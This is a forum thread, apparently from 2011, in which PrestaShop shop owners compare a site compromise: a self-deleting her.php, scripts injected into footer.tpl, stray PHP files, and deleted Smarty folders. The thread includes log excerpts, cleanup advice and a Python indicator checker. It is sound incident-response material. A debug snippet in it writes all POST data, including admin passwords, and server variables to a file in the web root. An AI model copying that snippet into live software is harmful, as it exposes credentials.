my shop ver is 1.4.2.5

 

is there any modification that I have to check?

 

if you find the solution for this hack, please tell us how we can protect the site not with just a new release (it is not possible for me to update to a newer release)

 

regards,

Gabor


would you advise going back to an older version?

 

replaced footer.tpl

removed several dodgy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!!

index.php had been amended

smarty.v2 removed and now reinstated


I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic.

In short, these are the changes:

 

1) a script is added to the footer.tpl file in the active theme folder

2) a php file is created in both /upload and /download folders

3) .htaccess file in /download folder is deleted

4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself)

5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt.

 

I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders.

 

In addition, it is also important to change your password for access of your BO (though I think this info is sent encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly).

 

Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards).

 

And hopefully the Prestashop developers will find out the source of all this quickly.

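The five changes listed in the post above can be checked mechanically against an installation. This is an added example, not code from the thread or from PrestaShop; the function names, the constructed sample tree and the rule that a stock index.php in /upload or /download is ignored are assumptions.

```python
import tempfile
from pathlib import Path

# Paths relative to the shop root, taken from the five-point list in the post above.
SMARTY_DIRS = ("tools/smarty/compile", "tools/smarty/cache", "tools/smarty_v2")
DROP_DIRS = ("upload", "download")


def check_install(root, theme):
    """Return sorted (item_number, message) findings for one PrestaShop tree."""
    root = Path(root)
    findings = []

    # 1) script added to footer.tpl of the active theme. Heuristic only: any
    #    <script tag is reported; confirm by diffing against a clean backup.
    footer = root / "themes" / theme / "footer.tpl"
    if footer.is_file() and "<script" in footer.read_text(errors="replace").lower():
        findings.append((1, f"themes/{theme}/footer.tpl contains a <script> tag"))

    # 2) PHP file created in /upload and /download. Assumption: a stock
    #    index.php placeholder may legitimately exist there and is skipped.
    for name in DROP_DIRS:
        folder = root / name
        if folder.is_dir():
            for p in sorted(folder.iterdir()):
                if p.suffix.lower() == ".php" and p.name != "index.php":
                    findings.append((2, f"unexpected PHP file {name}/{p.name}"))

    # 3) .htaccess deleted from /download
    if (root / "download").is_dir() and not (root / "download" / ".htaccess").is_file():
        findings.append((3, "download/.htaccess is missing"))

    # 4) Smarty folders deleted
    for rel in SMARTY_DIRS:
        if not (root / rel).is_dir():
            findings.append((4, f"{rel} is missing"))

    # 5) her.php in /modules (it deletes itself, so absence proves nothing)
    if (root / "modules" / "her.php").is_file():
        findings.append((5, "modules/her.php is present"))

    return sorted(findings)


def build_sample_tree(root, infected):
    """Create a constructed directory tree for the demo; not real shop data."""
    root = Path(root)
    for rel in SMARTY_DIRS + DROP_DIRS + ("modules", "themes/mytheme"):
        (root / rel).mkdir(parents=True, exist_ok=True)
    (root / "download" / ".htaccess").write_text("Deny from all\n")
    footer = root / "themes" / "mytheme" / "footer.tpl"
    footer.write_text("</div></body></html>\n")
    if infected:
        footer.write_text("{literal}<script>/* placeholder */</script>{/literal}\n")
        for name in DROP_DIRS:
            (root / name / "0123456789abcdef.php").write_text("<?php // placeholder\n")
        (root / "download" / ".htaccess").unlink()
        (root / "tools" / "smarty_v2").rmdir()
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for item, message in check_install(build_sample_tree(tmp, True), "mytheme"):
            print(f"[{item}] {message}")
```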

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

Idem with 1.4.4.0 on local install.

 

Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders.

 

What is the status of this situation? Does PS have a solution? This is very serious.


We were affected as well. v1.4.3.

 

Can confirm that smarty_v2 was deleted, there was the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting).

 

My install of PS had all the modules so I'm going through and deleting the unused ones.


Hi All,

I'm new to PrestaShop and just made my shop live. I was just browsing the forum and came across this hack.

I checked my files and it seems I have the same problem.

 

I deleted the .php files in the upload and download folders and got rid of the strange code inside the footer.tpl

 

it appears my main htaccess file was not altered added the htaccess redir as suggested in redit

 

I'm considering a new install but, what if I get infected again?

 

any advice

 

tks

 

jesan


Looks like there are a few similar calls made. However, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"


I got affected too.

so sad =(

:angry:

a lot of loss and resources wasted.

=(

If need anything to solve this let me know.

=)

 

 

Looks like there are a few similar calls made. However, it's 3 hours between.

 

xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17"

 

yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"


I got affected too.

so sad =(

:angry:

a lot of loss and resources wasted.

=(

If need anything to solve this let me know.

=)

 

My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file.

 

I would suggest the following until a more permanent fix is made.

 

1. Either remove write permission on modules folder, or uncomment the following code from

/admin/tabs/adminModules.php

function extractArchive($file)
{
/*
	global $currentIndex;
	$success = false;
	if (substr($file, -4) == '.zip')
	{
		if (!Tools::ZipExtract($file, _PS_MODULE_DIR_))
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}
	else
	{
		$archive = new Archive_Tar($file);
		if ($archive->extract(_PS_MODULE_DIR_))
			$success = true;
		else
			$this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).');
	}

	@unlink($file);
	if ($success)
		Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token);
*/
}

2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work.


Tested upgrading to SVN8151 version and saw the problem. Don't think it's from localhost machine.

 

Observation:

her.php file added

upload dir with additional file

download dir with additional file

themes/prestashop/footer.tpl altered

smarty/cache/* changed

smarty/compile/* changed

 

Categories FO not showing

3rd party homecarousel not working anymore


My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected.

 

My hosting is Spanish and my shop is only available in Spanish.

 

It is odd that stores are sometimes affected, and sometimes not. Could it be that the virus appears for a module such as Facebook?

 

Prestashop 1.4.4


OK this has just happened to me again.

 

Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK.

 

This morning exactly the same thing has happened again. This needs sorting ASAP.


I checked my store files and it seems I have the same problem.

 

I deleted the .php files in the upload and download folder and restored footer.tpl

I have also deleted all files in smarty/cache and smarty/compile

 

I did not find the file her.php in modules folder

 

prestashop 1.4.4.0


Just checked my sites & my clients' sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.


Last entry line in Apache log after local install on wamp

 

127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 -

 

Then the her.php has gone but footer.tpl has been modified.

 

PrestaShop 1.4.4

 

BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11

Edited by dazzza (see edit history)

Hello,

for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it as fast as possible. You can send your logs to Carl.

 

Regards

Attached is my log from this morning.

 

I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected.

 

I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected.

 

I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

PurpleEdge.zip


I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

 

I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work, I too use a module called protect.tpl from samhda. It helps to protect your theme if script name are not known...

 

I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.)

 

I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software.

 

The security theme is a wide complex theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure...

You must make your server secure to be not hacked.


This is my test finding.

 

Using SVN version_8151 to do a fresh installation (localhost)

 

Immediately after installation...access FO ---> no her.php file found

Then try access to BO by keying in password ---> her.php file was generated

No other files found in upload and download directory

Footer.tpl not altered

==continuing with further monitoring & testing

 

 

Please find attached access.log for your investigation.

access.txt


Hello,

for those who can reproduce this bug in localhost, can you please redo an install, and before you do any action on your prestashop please add the following code:

	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me by PM the log file her_log.txt in your Prestashop root folder, thank you :D


I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33


I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

 

Hi,

 

Try to re-upload your prestashop.

And check:

- /tools/smarty_v2/ exists

- /modules/her.php does NOT exist

 

Best regards,


Hello,

for those who can reproduce this bug in localhost, can you please redo an install, and before you do any action on your prestashop please add the following code:

	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me by PM the log file her_log.txt in your Prestashop root folder, thank you :D


Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutely no additional modules (it's a test site).

 

Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla.
